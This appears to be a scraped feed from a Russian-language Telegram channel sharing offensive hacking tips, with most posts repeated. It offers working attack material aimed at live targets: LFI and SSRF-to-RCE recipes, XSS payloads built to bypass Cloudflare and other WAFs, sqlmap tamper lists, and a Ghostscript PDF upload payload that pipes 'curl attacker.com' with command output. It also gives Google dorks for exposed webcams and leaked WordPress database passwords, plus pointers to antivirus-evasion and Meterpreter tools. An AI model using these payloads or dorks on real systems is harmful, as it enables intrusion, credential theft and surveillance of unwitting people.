SHADOW:Group
📑 Переходим от LFI к удаленному выполнению кода Статья описывает несколько способов, благодаря которым вы можете получить полноценное RCE на сайтах с LFI. #web #lfi #rce Читать статью
📑 Переходим от LFI к удаленному выполнению кода с помощью ZIP-архива
Если веб-сайт с LFI позволяет вам загружать .zip файлы, то для удаленного выполнения кода следует попробовать следующий алгоритм:
#web #lfi #rce
Если веб-сайт с LFI позволяет вам загружать .zip файлы, то для удаленного выполнения кода следует попробовать следующий алгоритм:
1. Создаём .php файл (rce.php);
2. Сжимаем его в архив .zip (file.zip);
3. Загружаем ваш .zip архив на уязвимый веб-сайт;
4. Удаленно выполняем код с помощью:
https://site.com/index.php?page=zip://path/file.zip%23rce.php
#web #lfi #rce
🖥 Инструмент для проведения MITM на RDP соединения
Pyrdp создан для проведения MITM атак на RDP и позволяет просматривать RDP-соединения в режиме реального времени или постфактум. Написан на Python3 и имеет открытый исходный код.
Более подробное описание работы можно прочитать в блоге авторов проекта.
Ссылка на GitHub
#soft #rdp #python #mitm
Pyrdp создан для проведения MITM атак на RDP и позволяет просматривать RDP-соединения в режиме реального времени или постфактум. Написан на Python3 и имеет открытый исходный код.
Более подробное описание работы можно прочитать в блоге авторов проекта.
Ссылка на GitHub
#soft #rdp #python #mitm
⛅️ Обход Cloudflare WAF
Рабочие на момент публикации полезные нагрузки, для проведения XSS на сайтах с защитой Cloudflare WAF.
#web #xss
Рабочие на момент публикации полезные нагрузки, для проведения XSS на сайтах с защитой Cloudflare WAF.
<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>
<img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&quot;" src="x" alt="showme">
#web #xss
⛓ Эксплуатация SSRF для доступа с правами админа
Небольшое описание и пример возможностей данной уязвимости на реальном сайте.
#web #ssrf
Читать статью
Небольшое описание и пример возможностей данной уязвимости на реальном сайте.
#web #ssrf
Читать статью
Telegraph
Эксплуатация SSRF для доступа с правами админа
Введение Подделка запросов на стороне сервера (SSRF) - это атака, при которой злоумышленник может заставить уязвимый сервер инициировать вредоносные запросы к сторонним серверам и/или внутренним ресурсам. Как правило, злоумышленник имеет полный или частичный…
Скрытая_нагрузка_Обходим_антивирус_и_загружаем_Meterpreter_из_памяти.pdf
2.3 MB
📖 Скрытая нагрузка. Обходим антивирус и загружаем Meterpreter из памяти в Windows 10
#malware #av
Инструмент из статьи
Источник
#malware #av
Инструмент из статьи
Источник
🧨 CVE-2020-35489: Загрузка произвольного файла в плагине Contact Form 7
Свежая критическая уязвимость в одном из самых популярных плагинов для WordPress. На момент публикации статьи минимум 3,5 миллиона сайтов имеют уязвимую версию данного плагина.
#cve #rce
Читать статью
Свежая критическая уязвимость в одном из самых популярных плагинов для WordPress. На момент публикации статьи минимум 3,5 миллиона сайтов имеют уязвимую версию данного плагина.
#cve #rce
Читать статью
Telegraph
CVE-2020-35489: Загрузка произвольного файла в плагине Contact Form 7
Введение Критическая уязвимость Unrestricted File Upload, получившая идентификатор CVE-2020-35489, была обнаружена в популярной CMS WordPress. Сайты, на которых установлен плагин под названием Contact Form 7 становятся уязвимыми для полного захвата сайта…
SHADOW:Group
⛓ Эксплуатация SSRF для доступа с правами админа Небольшое описание и пример возможностей данной уязвимости на реальном сайте. #web #ssrf Читать статью
🧨 Переходим от Blind SSRF к RCE:
Один из вариантов, при котором мы можем получить удалённое выполнение кода на сайтах с Blind SSRF:
- Находим 'url=' параметр;
- Проверяем на уязвимость к Blind SSRF;
- С помощью SSRF сканируем 127.0.0.1 и находим открытый порт 6379 (Redis)
- Используем Gopherus для генерации вредоносной ссылки для Redis. Если вы не знакомы с этим инструментом, то рекомендую прочитать данную статью.
- RCE
Redis (port-6379) в данном случае выбран в качестве примера. Инструмент позволяет проводить данную атаку для серверов MySQL (port-3306), PostgreSQL(port-5432), FastCGI (port-9000), Memcached (port-11211), Redis (port-6379), Zabbix (port-10050), SMTP (port-25).
#web #ssrf #rce
Один из вариантов, при котором мы можем получить удалённое выполнение кода на сайтах с Blind SSRF:
- Находим 'url=' параметр;
- Проверяем на уязвимость к Blind SSRF;
- С помощью SSRF сканируем 127.0.0.1 и находим открытый порт 6379 (Redis)
- Используем Gopherus для генерации вредоносной ссылки для Redis. Если вы не знакомы с этим инструментом, то рекомендую прочитать данную статью.
- RCE
Redis (port-6379) в данном случае выбран в качестве примера. Инструмент позволяет проводить данную атаку для серверов MySQL (port-3306), PostgreSQL(port-5432), FastCGI (port-9000), Memcached (port-11211), Redis (port-6379), Zabbix (port-10050), SMTP (port-25).
#web #ssrf #rce
🦠 Имитация действий пользователя через обратное соединение
Possessor - инструмент, позволяющий получить обратное соединение с использованием техники имитации пользователя, что не является подозрительным поведением для средств защиты.
По сути, основная идея техники заключается в использовании скрытого вторичного рабочего стола для имитации действий пользователя, минуя при этом анализ антивируса. Подробнее про технику можно почитать здесь.
#malware #av
Инструмент на Github
Видео демонстрация
Possessor - инструмент, позволяющий получить обратное соединение с использованием техники имитации пользователя, что не является подозрительным поведением для средств защиты.
По сути, основная идея техники заключается в использовании скрытого вторичного рабочего стола для имитации действий пользователя, минуя при этом анализ антивируса. Подробнее про технику можно почитать здесь.
#malware #av
Инструмент на Github
Видео демонстрация
YouTube
Possessor - Impersonating Users Through Connect Back (Demo)
https://github.com/gnxbr/Fully-Undetectable-Techniques/tree/main/possessor
⛔️ Находим и обходим страницы с ошибкой 403 (доступ запрещен)
Небольшой пример по автоматизации поиска и получения доступа к страницам, к которым доступ запрещен:
▫️Для поиска страниц с ответом 403 используем утилиту dirsearch и выполним команду:
▫️Устанавливаем утилиту 403bypasser и выполняем команду:
Для Burp можем использовать инструмент BurpSuite_403Bypasser.
#web
Небольшой пример по автоматизации поиска и получения доступа к страницам, к которым доступ запрещен:
▫️Для поиска страниц с ответом 403 используем утилиту dirsearch и выполним команду:
python3 dirsearch.py -r -b -u example.com -i 403 -e php,html,json,aspx,sql,asp,js,txt
▫️Полученные страницы помещаем в .txt файл (например 403.txt).▫️Устанавливаем утилиту 403bypasser и выполняем команду:
for i in $(cat 403.txt); do python3 403bypasser.py https://example.com/ $i ; done
▫️Ждем результатов с ответом 200 или 302.Для Burp можем использовать инструмент BurpSuite_403Bypasser.
#web
🖼 Взлом с помощью картинки. Полезная нагрузка PHP в изображении.
С помощью инструмента php-jpeg-injector можно производить атаки на веб-приложения, которые запускают изображение .jpeg через графическую библиотеку PHP GD.
Инструмент создаёт новый .jpeg файл с полезной нагрузкой PHP. Зараженный .jpeg файл запускается через gd-библиотеку PHP. PHP интерпретирует полезную нагрузку, введенную в jpeg, и выполняет ее.
#soft #web
Ссылка на GitHub
С помощью инструмента php-jpeg-injector можно производить атаки на веб-приложения, которые запускают изображение .jpeg через графическую библиотеку PHP GD.
Инструмент создаёт новый .jpeg файл с полезной нагрузкой PHP. Зараженный .jpeg файл запускается через gd-библиотеку PHP. PHP интерпретирует полезную нагрузку, введенную в jpeg, и выполняет ее.
#soft #web
Ссылка на GitHub
📑 Проводим XSS в CSS теге
Для проведения XSS в теге <style> можно использовать следующую полезную нагрузку:
Для обхода WAF:
#web #xss
Для проведения XSS в теге <style> можно использовать следующую полезную нагрузку:
<style>img{background-image:url('javascript:alert(1)')}</style>
Для обхода WAF:
<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>
#web #xss
💉 Значение Tamper в Sqlmap для обхода WAF
Ниже приведён список используемых значений tamper в sqlmap при проведении Blind Sql инъекций и обхода средств защиты веб приложений для различных СУБД (систем управления базой данных):
Пример:
▫️Mysql (Blind):
▫️Mysql,Mssql,Postgresql,Oracle (Blind):
▫️Mysql,Mssql,Postgresql (Blind):
▫️Mysql (Blind):
▫️Mysql (Blind):
▫️UTF-8 (Blind):
▫️Bypass waf in JSON (Blind):
▫️Mysql,Postgresql,Oracle (Blind):
▫️Cloudfare waf (Blind):
#web #sql
Ниже приведён список используемых значений tamper в sqlmap при проведении Blind Sql инъекций и обхода средств защиты веб приложений для различных СУБД (систем управления базой данных):
Пример:
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-db▫️Для Mysql,Mssql,Postgresql,Oracle (Blind):
between
▫️Mysql (Blind):
ifnull2casewhenisnull
ifnull2ifisnull
▫️Mysql,Mssql,Postgresql,Oracle (Blind):
charencode
▫️Mysql,Mssql,Postgresql (Blind):
charunicodeencode
▫️Mysql (Blind):
commalesslimit
commalessmid
▫️Mysql (Blind):
escapequotes
▫️UTF-8 (Blind):
apostrophemask
overlongutf8
overlongutf8more
▫️Bypass waf in JSON (Blind):
charunicodeescape
▫️Mysql,Postgresql,Oracle (Blind):
greatest
▫️Cloudfare waf (Blind):
xforwardedfor
#web #sql
🎄Друзья, всех с наступающим Новым годом!!🍾
Этот год был не простым для многих из нас, в том числе и для меня. Однако, именно благодаря удаленке и такому необычному режиму был создан этот канал 🤗
Я рад, что за пару месяцев так много человек появилось на канале. Мы делаем друг друга лучше и в новом году канал продолжит радовать вас годным контентом!🥳
А сейчас, желаю всем хорошего отдыха и счастливого Нового года!!!❤️
Этот год был не простым для многих из нас, в том числе и для меня. Однако, именно благодаря удаленке и такому необычному режиму был создан этот канал 🤗
Я рад, что за пару месяцев так много человек появилось на канале. Мы делаем друг друга лучше и в новом году канал продолжит радовать вас годным контентом!🥳
А сейчас, желаю всем хорошего отдыха и счастливого Нового года!!!❤️
🪦 Почему умирает ваша сессия Meterpreter? Попробуйте эти исправления..
Большинство причин весьма очевидны, хотя могут быть неизвестны новичкам.
Наибольший же интерес представляет пункт, в котором говорится об обходе антивирусных решений, миграции процесса и обфускации полезной нагрузки.
#redteam #av #malware
Читать статью
Большинство причин весьма очевидны, хотя могут быть неизвестны новичкам.
Наибольший же интерес представляет пункт, в котором говорится об обходе антивирусных решений, миграции процесса и обфускации полезной нагрузки.
#redteam #av #malware
Читать статью
Telegraph
Почему умирает ваша сессия Meterpreter? Попробуйте эти исправления..
При использовании Metasploit Framework вы наверняка много раз сталкивались с тем, что ваш сеанс meterpreter завершался, и вы видели в консоли сообщение об ошибке «Meterpreter session 1 closed. Reason: Died». В этой статье мы рассмотрим причины возникновения…
📂 Просмотр директорий Apache при ошибочной конфигурации сервера
Как показывает практика многие ресурсы допускают подобные ошибки при конфигурации.
При настройке Apache по умолчанию, просмотр каталогов отключен для порта 443 (см. скрин ниже). Однако, если отправить запрос на порт 80 (http, вместо https), обратившись через IP адрес вместо доменного имени, то мы сможем просматривать директории (запрос 2).
Запрос 1:
Запрос 2:
#web
Как показывает практика многие ресурсы допускают подобные ошибки при конфигурации.
При настройке Apache по умолчанию, просмотр каталогов отключен для порта 443 (см. скрин ниже). Однако, если отправить запрос на порт 80 (http, вместо https), обратившись через IP адрес вместо доменного имени, то мы сможем просматривать директории (запрос 2).
Запрос 1:
https://example.com/wp-content/uploads -> 403 Forbidden
Запрос 2:
http://1.1.1.1/wp-content/uploads -> 200 OK
#web
🧨 Удаленное выполнение кода при загрузке PDF файла
Если на сайте происходит загрузка файла через ImageMagick, Evince, GIMP, и некоторые другие утилиты для PDF/PS, то в большинстве случаев можно загрузить PDF файл и получить удаленное выполнение кода на сервере отправив запрос:
Подробности причин данной уязвимости можно прочитать по ссылке.
#web #rce
Если на сайте происходит загрузка файла через ImageMagick, Evince, GIMP, и некоторые другие утилиты для PDF/PS, то в большинстве случаев можно загрузить PDF файл и получить удаленное выполнение кода на сервере отправив запрос:
Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl attacker.com/?a=$(whoami|base64)).putdeviceparams
quit
Подробности причин данной уязвимости можно прочитать по ссылке.
#web #rce
🔍 Находим открытые веб-камеры
Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:
Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:
allintitle: "Network Camera NetworkCamera"
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live View / - AXIS"
intitle:"LiveView / - AXIS" | inurl:view/view.shtml
intitle:"Live View / - AXIS" | inurl:/mjpg/video.mjpg?timestamp
inurl:axis-cgi/jpg
inurl:"MultiCameraFrame?Mode=Motion"
inurl:/view.shtml
inurl:/view/index.shtml
"my webcamXP server!"
#google🏮 Утилита для поиска и эксплуатации CISCO CVE-2020-3452
Просто вводите название организации и утилита просканирует наличие уязвимости в Shodan, а при ее наличии выполнит эксплойт.
Данная уязвимость имеет высокий уровень опасности и касается межсетевого экрана Cisco ASA.
Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать конфиденциальные файлы.
#cve #soft
Ссылка на GitHub
Просто вводите название организации и утилита просканирует наличие уязвимости в Shodan, а при ее наличии выполнит эксплойт.
Данная уязвимость имеет высокий уровень опасности и касается межсетевого экрана Cisco ASA.
Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать конфиденциальные файлы.
#cve #soft
Ссылка на GitHub
🖇 Чего следует избегать при работе на WordPress
1.- Оставлять настройки по умолчанию.
2.- Допускать отсутствия контроля над публичным контентом и политиками.
Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:
#google #wp #web
1.- Оставлять настройки по умолчанию.
2.- Допускать отсутствия контроля над публичным контентом и политиками.
Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:
"define('DB_USER'," "define('DB_PASSWORD'," ext:txt
#google #wp #web